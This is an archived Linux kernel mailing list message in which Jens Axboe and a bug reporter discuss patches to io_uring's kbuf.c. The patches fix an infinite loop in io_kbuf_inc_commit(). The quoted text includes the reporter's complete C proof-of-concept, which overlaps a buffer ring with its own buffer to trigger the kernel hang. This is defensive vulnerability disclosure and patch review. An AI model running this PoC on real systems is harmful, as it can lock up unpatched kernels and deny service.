[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <8abaf4ad-d457-422d-9e9e-932cab2588e6@kernel.dk>
Date: Wed, 27 Aug 2025 20:08:05 -0600
From: Jens Axboe <axboe@...nel.dk>
To: Qingyue Zhang <chunzhennn@...com>
Cc: aftern00n@...com, io-uring@...r.kernel.org, linux-kernel@...r.kernel.org
Subject: Re: [PATCH 2/2] io_uring/kbuf: fix infinite loop in
io_kbuf_inc_commit()
On 8/27/25 7:36 PM, Qingyue Zhang wrote:
> On 2025-08-27 21:45 UTC, Jens Axboe wrote:
>> I took a closer look and there's another spot where we should be
>> using READ_ONCE() to get the buffer length. How about something like
>> the below rather than the loop work-around?
>>
>>
>> commit 7f472373b2855087ae2df9dc6a923f3016a1ed21
>> Author: Jens Axboe <axboe@...nel.dk>
>> Date: Wed Aug 27 15:27:30 2025 -0600
>>
>> io_uring/kbuf: always use READ_ONCE() to read ring provided buffer lengths
>>
>> Since the buffers are mapped from userspace, it is prudent to use
>> READ_ONCE() to read the value into a local variable, and use that for
>> any other actions taken. Having a stable read of the buffer length
>> avoids worrying about it changing after checking, or being read multiple
>> times.
>>
>> Fixes: c7fb19428d67 ("io_uring: add support for ring mapped supplied buffers")
>> Link: https://lore.kernel.org/io-uring/tencent_000C02641F6250C856D0C26228DE29A3D30A@qq.com/
>> Reported-by: Qingyue Zhang <chunzhennn@...com>
>> Signed-off-by: Jens Axboe <axboe@...nel.dk>
>>
>> diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
>> index 81a13338dfab..394037d3f2f6 100644
>> --- a/io_uring/kbuf.c
>> +++ b/io_uring/kbuf.c
>> @@ -36,15 +36,18 @@ static bool io_kbuf_inc_commit(struct io_buffer_list *bl, int len)
>> {
>> while (len) {
>> struct io_uring_buf *buf;
>> - u32 this_len;
>> + u32 buf_len, this_len;
>>
>> buf = io_ring_head_to_buf(bl->buf_ring, bl->head, bl->mask);
>> - this_len = min_t(u32, len, buf->len);
>> - buf->len -= this_len;
>> - if (buf->len) {
>> + buf_len = READ_ONCE(buf->len);
>> + this_len = min_t(u32, len, buf_len);
>> + buf_len -= this_len;
>> + if (buf_len) {
>> buf->addr += this_len;
>> + buf->len = buf_len;
>> return false;
>> }
>> + buf->len = 0;
>> bl->head++;
>> len -= this_len;
>> }
>> @@ -159,6 +162,7 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
>> __u16 tail, head = bl->head;
>> struct io_uring_buf *buf;
>> void __user *ret;
>> + u32 buf_len;
>>
>> tail = smp_load_acquire(&br->tail);
>> if (unlikely(tail == head))
>> @@ -168,8 +172,9 @@ static void __user *io_ring_buffer_select(struct io_kiocb *req, size_t *len,
>> req->flags |= REQ_F_BL_EMPTY;
>>
>> buf = io_ring_head_to_buf(br, head, bl->mask);
>> - if (*len == 0 || *len > buf->len)
>> - *len = buf->len;
>> + buf_len = READ_ONCE(buf->len);
>> + if (*len == 0 || *len > buf_len)
>> + *len = buf_len;
>> req->flags |= REQ_F_BUFFER_RING | REQ_F_BUFFERS_COMMIT;
>> req->buf_list = bl;
>> req->buf_index = buf->bid;
>> @@ -265,7 +270,7 @@ static int io_ring_buffers_peek(struct io_kiocb *req, struct buf_sel_arg *arg,
>>
>> req->buf_index = buf->bid;
>> do {
>> - u32 len = buf->len;
>> + u32 len = READ_ONCE(buf->len);
>>
>> /* truncate end piece, if needed, for non partial buffers */
>> if (len > arg->max_len) {
>
> I'm afraid this doesn't solve the problem. The value of buf->len
> could be changed before the function is called. Maybe we shouldn't
> trust it at all?
>
> Here is a PoC that can still trigger infinite loop:
>
> #include<liburing.h>
> #include<liburing/io_uring.h>
> #include<netinet/in.h>
> #include<stdint.h>
> #include<sys/socket.h>
> #include<arpa/inet.h>
> #include<stdlib.h>
> int main(){
> struct io_uring ring;
> struct io_uring_buf* buf_info;
>
> posix_memalign((void**)&buf_info, 4096, 4096);
> char* buf = malloc(0x1000);
> struct io_uring_buf_reg reg = {
> .ring_addr = (uint64_t)buf_info,
> .ring_entries = 2
> };
> buf_info[0].addr = (uint64_t)buf_info;
> buf_info[0].len = 0x1000;
> buf_info[0].bid = 0;
> buf_info[0].resv = 1; // tail
> io_uring_queue_init(0x10, &ring, IORING_SETUP_NO_SQARRAY);
> io_uring_register_buf_ring(&ring, &reg, IOU_PBUF_RING_INC);
>
> int fds[2];
> socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
> void* send_buf = calloc(1, 32);
> send(fds[0], send_buf, 32, MSG_DONTWAIT);
>
> struct io_uring_sqe* sqe = io_uring_get_sqe(&ring);
> io_uring_prep_recv(sqe, fds[1], NULL, 0, 0);
> sqe->flags |= 1<<IOSQE_BUFFER_SELECT_BIT;
> io_uring_submit(&ring);
> struct io_uring_cqe* cqe;
> io_uring_wait_cqe(&ring, &cqe);
> }
Gotcha, yes the READ_ONCE() will ensure we only read it once and it
can't get changed in between in that loop, but this one receives into
the buffer ring.
I don't think there's anything wrong with the looping, and stopping at
the other end is of course a safeguard, but couldn't we just abort the
loop if we see a 0 sized buffer? At that point we know the buffer is
invalid, or the kernel is buggy, and it'd be saner to stop at that
point. Something à la:
diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index 394037d3f2f6..19a8bde5e1e1 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -42,7 +42,8 @@ static bool io_kbuf_inc_commit(struct io_buffer_list *bl, int len)
buf_len = READ_ONCE(buf->len);
this_len = min_t(u32, len, buf_len);
buf_len -= this_len;
- if (buf_len) {
+ /* Stop looping for invalid buffer length of 0 */
+ if (buf_len || !this_len) {
buf->addr += this_len;
buf->len = buf_len;
return false;
--
Jens Axboe
Powered by blists - more mailing lists